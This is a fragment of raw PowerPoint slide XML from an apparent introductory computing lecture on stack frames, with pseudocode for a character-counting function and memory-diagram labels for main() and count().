            <p:cNvPr id="27" name="Left Bracket 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FADA7FCB-6917-4578-8649-A15085371812}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414871" y="2547879"/>
              <a:ext cx="179293" cy="880579"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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BBB9F7A-3E34-4926-B407-BB1A4EBDC88D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7697918" y="2788218"/>
              <a:ext cx="9504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count()</a:t>
              </a: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F329E00F-D4F3-4A01-A68D-318042447541}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885568" y="2372592"/>
            <a:ext cx="6277424" cy="266550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This example is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>almost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> correct. But something very important is missing…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="373786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96296E-6 L -0.00039 0.05324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0.05324 L -0.00039 -0.49236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49236 L 2.91667E-6 -0.10718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0.10695 L 0.00013 0.1125 " pathEditMode="relative" rAng="0" ptsTypes="AA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6" grpId="6" animBg="1"/>
      <p:bldP spid="16" grpId="7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9" grpId="0" animBg="1"/>
      <p:bldP spid="29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B3FD1-40EA-432C-A286-A9B673140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433196" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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B7E7A-4158-4A3A-9991-2A74F262C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8113" y="1825625"/>
            <a:ext cx="6384373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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count(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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> s, 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character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c) {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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count;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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt; length(s); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (s[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] == c) count = count + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count;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18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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 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strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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count(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“testing”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0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“t”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// should return 2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CD840B-4B1D-4754-984C-B90D0160516D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9413956" y="365125"/>
            <a:ext cx="1256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Memory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E4E672-CDAA-485B-9583-9699C6DF79E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11340296" y="826790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2980C7-F5FE-4849-AB85-A7375AFA2548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11399966" y="6197293"/>
            <a:ext cx="568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369C03-1A8F-4186-9F55-472D98B5C2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8722391" y="826790"/>
            <a:ext cx="0" cy="556305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CDC6264-C836-4FF5-9E0D-22D2C943BE57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11366759" y="826790"/>
            <a:ext cx="0" cy="556305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D67E3C3-5953-4380-8F73-9F71921817FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941781" y="1825625"/>
            <a:ext cx="702874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0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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1: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2: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3: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4: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5:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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6: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7: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8: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5A080C8E-FFB2-4DB6-82F5-FE53CA42626B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285623" y="4183463"/>
            <a:ext cx="980105" cy="86512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F62BF2-F3FF-4D00-BE59-120561E20530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="1255059"/>
            <a:ext cx="2504140" cy="70522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argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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58FE83-725B-4D37-ABD4-021E0287CD35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="2035939"/>
            <a:ext cx="2504140" cy="40246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argc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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AEAB490-5D15-4AF4-847B-A2A269CBC1C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="3025997"/>
            <a:ext cx="2504140" cy="40246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“testing”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E1AEF61-2B46-4F3C-94FF-2BD8CB0AADCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="2547879"/>
            <a:ext cx="2504140" cy="40246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“t”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BF1FFFF-D29F-47D9-AB0C-C55D1C748422}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="3982233"/>
            <a:ext cx="2504140" cy="40246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pos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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88226CC-58DF-4A7F-BA11-36AF21EA00AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="3504115"/>
            <a:ext cx="2504140" cy="40246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count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8DB585E-751C-4FDD-9A5B-A85F7B19DE3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7973090" y="2547879"/>
            <a:ext cx="621074" cy="880579"/>
            <a:chOff x="7973090" y="2547879"/>
            <a:chExt cx="621074" cy="880579"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Left Bracket 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8D45CC-5A52-493C-AB99-F7C144AE0D7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414871" y="2547879"/>
              <a:ext cx="179293" cy="880579"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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03EADBE-EC70-4A0C-8EB5-E410A92ACFC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7732960" y="2788218"/>
              <a:ext cx="8803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main()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A001156-8D8D-4DD5-9C0F-2A4C3E5C60C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7971755" y="3469282"/>
            <a:ext cx="621074" cy="950453"/>
            <a:chOff x="7973090" y="2513046"/>
            <a:chExt cx="621074" cy="950453"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Left Bracket 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FADA7FCB-6917-4578-8649-A15085371812}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414871" y="2547879"/>
              <a:ext cx="179293" cy="880579"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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BBB9F7A-3E34-4926-B407-BB1A4EBDC88D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7697918" y="2788218"/>
              <a:ext cx="9504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count()</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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8C605277-9C91-4BD2-AB34-678E3692B5CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941781" y="2283012"/>
            <a:ext cx="3612290" cy="1480951"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -41018"/>
              <a:gd name="adj2" fmla="val 8631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IP needs to go back to line 8. But how does the CPU know that?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80708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B3FD1-40EA-432C-A286-A9B673140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433196" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack Frame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B7E7A-4158-4A3A-9991-2A74F262C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8113" y="1825625"/>
            <a:ext cx="6384373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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count(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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> s, 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character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c) {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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count;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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt; length(s); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (s[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] == c) count = count + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count;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18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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 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strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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count(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“testing”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0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“t”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// should return 2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CD840B-4B1D-4754-984C-B90D0160516D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9413956" y="365125"/>
            <a:ext cx="1256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Memory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E4E672-CDAA-485B-9583-9699C6DF79E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11340296" y="826790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2980C7-F5FE-4849-AB85-A7375AFA2548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11399966" y="6197293"/>
            <a:ext cx="568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369C03-1A8F-4186-9F55-472D98B5C2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8722391" y="826790"/>
            <a:ext cx="0" cy="556305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CDC6264-C836-4FF5-9E0D-22D2C943BE57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11366759" y="826790"/>
            <a:ext cx="0" cy="556305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D67E3C3-5953-4380-8F73-9F71921817FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941781" y="1825625"/>
            <a:ext cx="702874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0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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1: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2: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3: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4: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5:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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6: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7: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8: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5A080C8E-FFB2-4DB6-82F5-FE53CA42626B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250217" y="4922428"/>
            <a:ext cx="980105" cy="86512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F62BF2-F3FF-4D00-BE59-120561E20530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="1255059"/>
            <a:ext cx="2504140" cy="70522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argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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58FE83-725B-4D37-ABD4-021E0287CD35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
